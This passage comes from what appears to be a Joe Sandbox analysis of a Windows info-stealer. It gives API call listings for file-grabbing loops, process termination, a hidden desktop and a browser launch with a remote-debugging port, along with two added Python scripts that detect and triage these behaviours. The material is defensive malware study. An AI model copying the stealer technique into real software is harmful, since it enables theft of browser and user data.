                                • Associated: 00000000.00000002.1351253519.0000000000A3E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1351253519.0000000000A46000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1351253519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1351253519.0000000000BE8000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1351416976.0000000000BFA000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1351433845.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1351433845.0000000000D8A000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1351433845.0000000000E63000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1351433845.0000000000E89000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1351433845.0000000000E91000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1351433845.0000000000EA0000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1351684562.0000000000EA1000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1351789058.000000000103B000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1351805059.000000000103C000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$Process32lstrcat$Closememset$HandleNextProcessstrlen$CreateDesktopOpen$FirstSnapshotTerminateToolhelp32wsprintf$FolderPathSleepSystemTimelstrcpynlstrlen
                                • String ID: --remote-debugging-port=9229 --profile-directory="$%s%s$D
                                • API String ID: 2040986984-1862457068
                                • Opcode ID: 93adc251055a497d128b07c74dfc77b3c05f99cc56d23ad4c44f55a750aa5a5f
                                • Instruction ID: 5ca4e53335f24a2480df8f81ce2db86b5c0abe67b38eca789c853e5ee1e8e453
                                • Opcode Fuzzy Hash: 93adc251055a497d128b07c74dfc77b3c05f99cc56d23ad4c44f55a750aa5a5f
                                • Instruction Fuzzy Hash: 05918471A50248ABDB50DFB4DD85FDE77B8EF84700F508599F609AB281DF70AA448BA0
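The call list above shows the sample building a command line from the literal `--remote-debugging-port=9229 --profile-directory="`, opening or creating a separate desktop (OpenDesktopA/CreateDesktopA with access mask 0x10000000, GENERIC_ALL), terminating processes by name through a Toolhelp32 snapshot (OpenProcess with 0x1, PROCESS_TERMINATE), resolving CSIDL 0x1C (CSIDL_LOCAL_APPDATA) with SHGetFolderPathA, and sleeping 0x1388 = 5000 ms before CloseDesktop. A browser started this way exposes its DevTools endpoint on the loopback interface while its window sits on a desktop the user never sees. The scanner below is an added example, not part of the Joe Sandbox report or of the sample: it flags process-creation events in which a Chromium-based browser is launched with that flag pair. The Sysmon-style "Key: Value" event layout and the list of browser image names are assumptions made for this example; the report does not name a browser.

```python
"""Detection logic for the browser launch described by the call list above.

Added example, not part of the Joe Sandbox report or of the sample. It scans
process-creation events for a Chromium-based browser started with the flags
the sample concatenates (--remote-debugging-port and --profile-directory).
The event layout (Sysmon-style "Key: Value" blocks) and the browser image
names are assumptions made for the example.
"""
import re
from dataclasses import dataclass
from typing import Optional

# Assumption: executables of Chromium-based browsers that honour these flags.
CHROMIUM_IMAGES = {"chrome.exe", "msedge.exe", "brave.exe", "opera.exe", "vivaldi.exe"}

DEBUG_PORT = re.compile(r"--remote-debugging-port=(\d+)", re.IGNORECASE)
PROFILE_DIR = re.compile(r'--profile-directory="?([^"\s]+)', re.IGNORECASE)


@dataclass
class Finding:
    pid: int
    image: str
    parent_image: str
    port: int
    profile: str
    score: int
    reasons: tuple


def parse_event(block: str) -> dict:
    """Turn one 'Key: Value' block into a dict (the first ':' separates key and value)."""
    event = {}
    for line in block.strip().splitlines():
        key, _, value = line.partition(":")
        event[key.strip()] = value.strip()
    return event


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def evaluate(event: dict) -> Optional[Finding]:
    """Score one event; None when it is not a browser started with a debugging port."""
    image = basename(event.get("Image", ""))
    if image not in CHROMIUM_IMAGES:
        return None
    cmd = event.get("CommandLine", "")
    port = DEBUG_PORT.search(cmd)
    if not port:
        return None
    score, reasons = 50, ["--remote-debugging-port on the command line"]
    profile = PROFILE_DIR.search(cmd)
    if profile:
        score += 20
        reasons.append("explicit --profile-directory selects a user profile to read")
    parent = basename(event.get("ParentImage", ""))
    if parent not in CHROMIUM_IMAGES:
        score += 30
        reasons.append(f"parent is not a browser: {parent or '<unknown>'}")
    return Finding(
        pid=int(event.get("ProcessId", 0)),
        image=image,
        parent_image=parent,
        port=int(port.group(1)),
        profile=profile.group(1) if profile else "",
        score=score,
        reasons=tuple(reasons),
    )


def scan(events: str) -> list:
    """Evaluate every blank-line separated event block and keep the hits."""
    findings = [evaluate(parse_event(b)) for b in events.split("\n\n") if b.strip()]
    return [f for f in findings if f is not None]


# Constructed sample events (not taken from the report): a launch by an
# unrelated parent with the flag pair, a normal launch, and a debug launch by
# the browser itself (developer workflow, lower score).
SAMPLE_EVENTS = """\
Image: C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe
ProcessId: 4120
ParentImage: C:\\Users\\user\\Desktop\\file.exe
CommandLine: "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe" --remote-debugging-port=9229 --profile-directory="Default"

Image: C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe
ProcessId: 5200
ParentImage: C:\\Windows\\explorer.exe
CommandLine: "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe"

Image: C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe
ProcessId: 6011
ParentImage: C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe
CommandLine: "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe" --remote-debugging-port=9222
"""

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"pid {f.pid} {f.image} port {f.port} score {f.score}: {'; '.join(f.reasons)}")
```

The command line alone is a strong signal because the flag pair has little legitimate use outside development; the parent check separates a stealer launching the browser from a developer starting it by hand. To confirm abuse, correlate the hit with a loopback TCP connection to the parsed port from the parent process during the seconds that follow; the call list above shows only the launch and the 5 s Sleep, so the connection itself is not evidenced on this page.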
                                APIs
                                • lstrcpy.KERNEL32(00000000,009DCFEC), ref: 009C1291
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C12B4
                                • lstrcat.KERNEL32(00000000,00000000), ref: 009C12BF
                                • lstrlen.KERNEL32(009E4CA8), ref: 009C12CA
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C12E7
                                • lstrcat.KERNEL32(00000000,009E4CA8), ref: 009C12F3
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C131E
                                • FindFirstFileA.KERNEL32(00000000,?), ref: 009C133A
                                • StrCmpCA.SHLWAPI(?,009E17A0), ref: 009C135C
                                • StrCmpCA.SHLWAPI(?,009E17A4), ref: 009C1376
                                • lstrcpy.KERNEL32(00000000,009DCFEC), ref: 009C13AF
                                • lstrcpy.KERNEL32(00000000,?), ref: 009C13D7
                                • lstrcat.KERNEL32(00000000,00000000), ref: 009C13E2
                                • lstrlen.KERNEL32(009E1794), ref: 009C13ED
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C140A
                                • lstrcat.KERNEL32(00000000,009E1794), ref: 009C1416
                                • lstrlen.KERNEL32(?), ref: 009C1423
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C1443
                                • lstrcat.KERNEL32(00000000,?), ref: 009C1451
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C147A
                                • StrCmpCA.SHLWAPI(?,010CD190), ref: 009C14A3
                                • lstrcpy.KERNEL32(00000000,?), ref: 009C14E4
                                • lstrcpy.KERNEL32(00000000,?), ref: 009C150D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C1535
                                • StrCmpCA.SHLWAPI(?,010CDBF0), ref: 009C1552
                                • lstrcpy.KERNEL32(00000000,?), ref: 009C1593
                                • lstrcpy.KERNEL32(00000000,?), ref: 009C15BC
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C15E4
                                • lstrcpy.KERNEL32(00000000,?), ref: 009C1796
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C17BE
                                • lstrcpy.KERNEL32(00000000,?), ref: 009C17F5
                                • FindNextFileA.KERNEL32(00000000,?), ref: 009C181C
                                • FindClose.KERNEL32(00000000), ref: 009C182B
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                • Associated: 00000000.00000002.1351235168.00000000009B0000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1351253519.00000000009E7000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1351253519.0000000000A3E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1351253519.0000000000A46000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1351253519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1351253519.0000000000BE8000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1351416976.0000000000BFA000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1351433845.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1351433845.0000000000D8A000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1351433845.0000000000E63000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1351433845.0000000000E89000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1351433845.0000000000E91000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1351433845.0000000000EA0000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1351684562.0000000000EA1000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1351789058.000000000103B000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1351805059.000000000103C000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$Findlstrlen$File$CloseFirstNext
                                • String ID:
                                • API String ID: 1346933759-0
                                • Opcode ID: 254384aa08f626a51b98df71656b3b4fb46632ad950fa967aaa4c9b66835aef1
                                • Instruction ID: 2f4b9a5461f2d1dc299392c25674c4a7d66ecadcd066f7750ef6386bf0cc06cb
                                • Opcode Fuzzy Hash: 254384aa08f626a51b98df71656b3b4fb46632ad950fa967aaa4c9b66835aef1
                                • Instruction Fuzzy Hash: 14C19F71A102469BDB21EF74DE89BEE77B8EF85310F144428F84AA7252DF34DC058B92
                                APIs
                                • wsprintfA.USER32 ref: 009CE22C
                                • FindFirstFileA.KERNEL32(?,?), ref: 009CE243
                                • StrCmpCA.SHLWAPI(?,009E17A0), ref: 009CE263
                                • StrCmpCA.SHLWAPI(?,009E17A4), ref: 009CE27D
                                • wsprintfA.USER32 ref: 009CE2A2
                                • StrCmpCA.SHLWAPI(?,009DCFEC), ref: 009CE2B4
                                • wsprintfA.USER32 ref: 009CE2D1
                                  • Part of subcall function 009CEDE0: lstrcpy.KERNEL32(00000000,?), ref: 009CEE12
                                • wsprintfA.USER32 ref: 009CE2F0
                                • PathMatchSpecA.SHLWAPI(?,?), ref: 009CE304
                                • lstrcat.KERNEL32(?,010CF3C8), ref: 009CE335
                                • lstrcat.KERNEL32(?,009E1794), ref: 009CE347
                                • lstrcat.KERNEL32(?,?), ref: 009CE358
                                • lstrcat.KERNEL32(?,009E1794), ref: 009CE36A
                                • lstrcat.KERNEL32(?,?), ref: 009CE37E
                                • CopyFileA.KERNEL32(?,?,00000001), ref: 009CE394
                                • lstrcpy.KERNEL32(00000000,?), ref: 009CE3D2
                                • lstrcpy.KERNEL32(00000000,?), ref: 009CE422
                                • DeleteFileA.KERNEL32(?), ref: 009CE45C
                                  • Part of subcall function 009B1530: lstrcpy.KERNEL32(00000000,?), ref: 009B1557
                                  • Part of subcall function 009B1530: lstrcpy.KERNEL32(00000000,?), ref: 009B1579
                                  • Part of subcall function 009B1530: lstrcpy.KERNEL32(00000000,?), ref: 009B159B
                                  • Part of subcall function 009B1530: lstrcpy.KERNEL32(00000000,?), ref: 009B15FF
                                • FindNextFileA.KERNEL32(00000000,?), ref: 009CE49B
                                • FindClose.KERNEL32(00000000), ref: 009CE4AA
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                • Associated: 00000000.00000002.1351235168.00000000009B0000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1351253519.00000000009E7000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1351253519.0000000000A3E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1351253519.0000000000A46000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1351253519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1351253519.0000000000BE8000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1351416976.0000000000BFA000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1351433845.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1351433845.0000000000D8A000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1351433845.0000000000E63000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1351433845.0000000000E89000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1351433845.0000000000E91000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1351433845.0000000000EA0000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1351684562.0000000000EA1000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1351789058.000000000103B000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1351805059.000000000103C000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$Filewsprintf$Find$CloseCopyDeleteFirstMatchNextPathSpec
                                • String ID: %s\%s$%s\*
                                • API String ID: 1375681507-2848263008
                                • Opcode ID: 0a63a3b7616628f402e8b8559fdf8e5e1c7060fe3a62d50f40f44103e7414a75
                                • Instruction ID: d76add854eb1aa3c63b46f295010a20d8c86a8f4f5030b7aea29948225182412
                                • Opcode Fuzzy Hash: 0a63a3b7616628f402e8b8559fdf8e5e1c7060fe3a62d50f40f44103e7414a75
                                • Instruction Fuzzy Hash: A78191719002589BCB20EFA4DD89FEE7779BF84300F004998B51AA7191DF34AE48CFA1
                                APIs
                                • lstrcpy.KERNEL32(00000000,009DCFEC), ref: 009B16E2
                                • lstrcpy.KERNEL32(00000000,009DCFEC), ref: 009B1719
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009B176C
                                • lstrcat.KERNEL32(00000000), ref: 009B1776
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009B17A2
                                • lstrcpy.KERNEL32(00000000,?), ref: 009B18F3
                                • lstrcat.KERNEL32(00000000,00000000), ref: 009B18FE
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                • Associated: 00000000.00000002.1351235168.00000000009B0000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1351253519.00000000009E7000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1351253519.0000000000A3E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1351253519.0000000000A46000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1351253519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1351253519.0000000000BE8000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1351416976.0000000000BFA000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1351433845.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1351433845.0000000000D8A000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1351433845.0000000000E63000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1351433845.0000000000E89000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1351433845.0000000000E91000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1351433845.0000000000EA0000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1351684562.0000000000EA1000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1351789058.000000000103B000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1351805059.000000000103C000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat
                                • String ID: \*.*
                                • API String ID: 2276651480-1173974218
                                • Opcode ID: 6c91744e76eeb8d68dd8128f2ecd8f7679e4167ab4f577432b54e82de874c220
                                • Instruction ID: ae6a13416ffa96a6b8bc46178f8515eae99b75add4e81f4f683586bf39110b6e
                                • Opcode Fuzzy Hash: 6c91744e76eeb8d68dd8128f2ecd8f7679e4167ab4f577432b54e82de874c220
                                • Instruction Fuzzy Hash: 1381813191025A9BCB21EFA8DBD9BEE77B9EF84721F540124F805AB291CB30DD05CB91
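The function records on this page all follow one shape: a list of direct calls, indented "Part of subcall function" lines for callees, and a handful of format strings (`%s\*`, `%s\%s`, `\*.*`). Read together, the FindFirstFileA/FindNextFileA/FindClose loops with StrCmpCA against two fixed strings (the usual `.` and `..` skip), PathMatchSpecA against a mask, and CopyFileA or CreateFileA/GetFileSizeEx describe a file grabber, while the Toolhelp32 snapshot plus TerminateProcess, OpenDesktopA/CreateDesktopA and the `--remote-debugging-port=` literal describe the browser launch. The script below is an added example, not part of the report and not Joe Sandbox code: it parses listings in this exact text form, collects the APIs each function reaches directly or through a listed subcall, and tags the function with the behaviour that API set implies. The signature table is this example's own heuristic, and the two embedded records are trimmed copies of the first two listings above.

```python
"""Triage of the Joe Sandbox per-function "APIs" listings on this page.

Added example, not part of the report and not Joe Sandbox code. It parses
the call lines (direct calls and "Part of subcall function" lines), collects
the set of APIs each function reaches, and tags the function with the
behaviour those APIs imply. The signature table is this example's own
heuristic; the embedded records are trimmed copies of listings shown above.
"""
import re
from collections import OrderedDict

# One call line: optional subcall prefix, API.MODULE, optional (args), ref: ADDR
CALL = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]{8}):\s*)?"
    r"(?P<name>\S+?)\.(?P<mod>[A-Z0-9]+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]{8})"
)

# Every API in a set must be reachable (directly or via a listed subcall).
SIGNATURES = OrderedDict([
    ("directory enumeration", {"FindFirstFileA", "FindNextFileA", "FindClose"}),
    ("file grabber", {"FindFirstFileA", "FindNextFileA", "PathMatchSpecA", "CopyFileA"}),
    ("process termination", {"CreateToolhelp32Snapshot", "Process32First",
                             "Process32Next", "OpenProcess", "TerminateProcess"}),
    ("hidden desktop", {"OpenDesktopA", "CreateDesktopA", "CloseDesktop"}),
])
# Substrings of call arguments that identify a behaviour on their own.
STRING_SIGNATURES = {"browser remote-debugging launch": "--remote-debugging-port="}


def parse_records(text):
    """Split the listing at each 'APIs' header and collect the calls per record."""
    records, current = [], None
    for line in text.splitlines():
        if line.strip() == "APIs":
            current = {"first_ref": None, "direct": set(), "subcalls": {}, "args": []}
            records.append(current)
            continue
        m = CALL.match(line) if current is not None else None
        if not m:
            continue
        if m.group("sub"):
            current["subcalls"].setdefault(m.group("sub"), set()).add(m.group("name"))
        else:
            current["direct"].add(m.group("name"))
            current["first_ref"] = current["first_ref"] or m.group("ref")
        if m.group("args"):
            current["args"].append(m.group("args"))
    return records


def reachable(record):
    """Direct calls plus everything reached through the listed subcalls."""
    apis = set(record["direct"])
    for calls in record["subcalls"].values():
        apis |= calls
    return apis


def tag(record):
    apis = reachable(record)
    tags = [name for name, needed in SIGNATURES.items() if needed <= apis]
    blob = " ".join(record["args"])
    tags += [name for name, needle in STRING_SIGNATURES.items() if needle in blob]
    return tags


def triage(text):
    """Return (address of the first direct call, tags) for every record."""
    return [(r["first_ref"], tag(r)) for r in parse_records(text)]


# Trimmed copies of the first two listings on this page.
SAMPLE = """\
APIs
• wsprintfA.USER32 ref: 009CCBFC
• FindFirstFileA.KERNEL32(?,?), ref: 009CCC13
• StrCmpCA.SHLWAPI(?,009E17A0), ref: 009CCC71
• PathMatchSpecA.SHLWAPI(?,010C89A8), ref: 009CCCE2
• CoInitialize.OLE32(00000000), ref: 009CCCEE
  • Part of subcall function 009CCAE0: CoCreateInstance.COMBASE(009DB110,00000000,00000001,009DB100,?), ref: 009CCB06
• CopyFileA.KERNEL32(?,?,00000001), ref: 009CCDF1
• CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 009CCE10
• GetFileSizeEx.KERNEL32(00000000,?), ref: 009CCE28
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 009CCE54
• FindNextFileA.KERNEL32(?,?), ref: 009CCF8D
• FindClose.KERNEL32(?), ref: 009CCF9F
Strings
Memory Dump Source
• Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
APIs
• memset.MSVCRT ref: 009B9790
• lstrcat.KERNEL32(?, --remote-debugging-port=9229 --profile-directory="), ref: 009B97C3
• OpenDesktopA.USER32(?,00000000,00000001,10000000), ref: 009B9827
• CreateDesktopA.USER32(?,00000000,00000000,00000000,10000000,00000000), ref: 009B9844
  • Part of subcall function 009D46A0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 009D46B9
  • Part of subcall function 009D46A0: Process32First.KERNEL32(00000000,00000128), ref: 009D46C9
  • Part of subcall function 009D46A0: Process32Next.KERNEL32(00000000,00000128), ref: 009D46DB
  • Part of subcall function 009D46A0: OpenProcess.KERNEL32(00000001,00000000,?), ref: 009D4702
  • Part of subcall function 009D46A0: TerminateProcess.KERNEL32(00000000,00000000), ref: 009D4711
• SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 009B98D4
• Sleep.KERNEL32(00001388), ref: 009B99E7
• CloseDesktop.USER32(?), ref: 009B9A1C
"""

if __name__ == "__main__":
    for ref, tags in triage(SAMPLE):
        print(ref, ", ".join(tags) or "no signature")
```

Run against the full page text, the same loop tags the walkers at 009CE22C and 009CDD62 (which add DeleteFileA after the copy) and the `\*.*` path builder at 009B16E2, which only concatenates and is left untagged. The literal arguments in these listings decode as follows: SHGetFolderPathA 0x1C is CSIDL_LOCAL_APPDATA and 0x1A is CSIDL_APPDATA; CreateToolhelp32Snapshot 0x2 is TH32CS_SNAPPROCESS; OpenProcess 0x1 is PROCESS_TERMINATE; CreateFileA 0x80000000/0x3/0x3/0x80 is GENERIC_READ, FILE_SHARE_READ|FILE_SHARE_WRITE, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL; Sleep 0x1388 is 5000 ms; and 0x104 passed to MultiByteToWideChar and lstrcpyn is MAX_PATH.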
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 009CDD45
                                • RtlAllocateHeap.NTDLL(00000000), ref: 009CDD4C
                                • wsprintfA.USER32 ref: 009CDD62
                                • FindFirstFileA.KERNEL32(?,?), ref: 009CDD79
                                • StrCmpCA.SHLWAPI(?,009E17A0), ref: 009CDD9C
                                • StrCmpCA.SHLWAPI(?,009E17A4), ref: 009CDDB6
                                • wsprintfA.USER32 ref: 009CDDD4
                                • DeleteFileA.KERNEL32(?), ref: 009CDE20
                                • CopyFileA.KERNEL32(?,?,00000001), ref: 009CDDED
                                  • Part of subcall function 009B1530: lstrcpy.KERNEL32(00000000,?), ref: 009B1557
                                  • Part of subcall function 009B1530: lstrcpy.KERNEL32(00000000,?), ref: 009B1579
                                  • Part of subcall function 009B1530: lstrcpy.KERNEL32(00000000,?), ref: 009B159B
                                  • Part of subcall function 009B1530: lstrcpy.KERNEL32(00000000,?), ref: 009B15FF
                                  • Part of subcall function 009CD980: memset.MSVCRT ref: 009CD9A1
                                  • Part of subcall function 009CD980: memset.MSVCRT ref: 009CD9B3
                                  • Part of subcall function 009CD980: SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 009CD9DB
                                  • Part of subcall function 009CD980: lstrcpy.KERNEL32(00000000,?), ref: 009CDA0E
                                  • Part of subcall function 009CD980: lstrcat.KERNEL32(?,00000000), ref: 009CDA1C
                                  • Part of subcall function 009CD980: lstrcat.KERNEL32(?,010CED38), ref: 009CDA36
                                  • Part of subcall function 009CD980: lstrcat.KERNEL32(?,?), ref: 009CDA4A
                                  • Part of subcall function 009CD980: lstrcat.KERNEL32(?,010CD1A8), ref: 009CDA5E
                                  • Part of subcall function 009CD980: lstrcpy.KERNEL32(00000000,?), ref: 009CDA8E
                                  • Part of subcall function 009CD980: GetFileAttributesA.KERNEL32(00000000), ref: 009CDA95
                                • FindNextFileA.KERNEL32(00000000,?), ref: 009CDE2E
                                • FindClose.KERNEL32(00000000), ref: 009CDE3D
                                • lstrcat.KERNEL32(?,010CF3C8), ref: 009CDE66
                                • lstrcat.KERNEL32(?,010CDB70), ref: 009CDE7A
                                • lstrlen.KERNEL32(?), ref: 009CDE84
                                • lstrlen.KERNEL32(?), ref: 009CDE92
                                • lstrcpy.KERNEL32(00000000,?), ref: 009CDED2
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                 • Associated: 00000000.00000002.1351235168.00000000009B0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.00000000009E7000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.0000000000A3E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.0000000000A46000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.0000000000BE8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351416976.0000000000BFA000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000D8A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000E63000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000E89000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000E91000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000EA0000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351684562.0000000000EA1000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351789058.000000000103B000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351805059.000000000103C000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$File$Find$Heaplstrlenmemsetwsprintf$AllocateAttributesCloseCopyDeleteFirstFolderNextPathProcess
                                • String ID: %s\%s$%s\*
                                • API String ID: 4184593125-2848263008
                                • Opcode ID: 7d86d0e8d97d96d6a1394e1523443dfde474414eb38d4f4a4de99cb70d7500e0
                                • Instruction ID: d37a11b0a92459d8518082913c2dea82fc852d7f342c2a3b2332a6c30b6f90f9
                                • Opcode Fuzzy Hash: 7d86d0e8d97d96d6a1394e1523443dfde474414eb38d4f4a4de99cb70d7500e0
                                • Instruction Fuzzy Hash: AD615471910248ABCB21EFB4DD89BDE7779FF88310F4045A8B50AA7291DF34AE44CB91
                                APIs
                                • wsprintfA.USER32 ref: 009CD54D
                                • FindFirstFileA.KERNEL32(?,?), ref: 009CD564
                                • StrCmpCA.SHLWAPI(?,009E17A0), ref: 009CD584
                                • StrCmpCA.SHLWAPI(?,009E17A4), ref: 009CD59E
                                • lstrcat.KERNEL32(?,010CF3C8), ref: 009CD5E3
                                • lstrcat.KERNEL32(?,010CF418), ref: 009CD5F7
                                • lstrcat.KERNEL32(?,?), ref: 009CD60B
                                • lstrcat.KERNEL32(?,?), ref: 009CD61C
                                • lstrcat.KERNEL32(?,009E1794), ref: 009CD62E
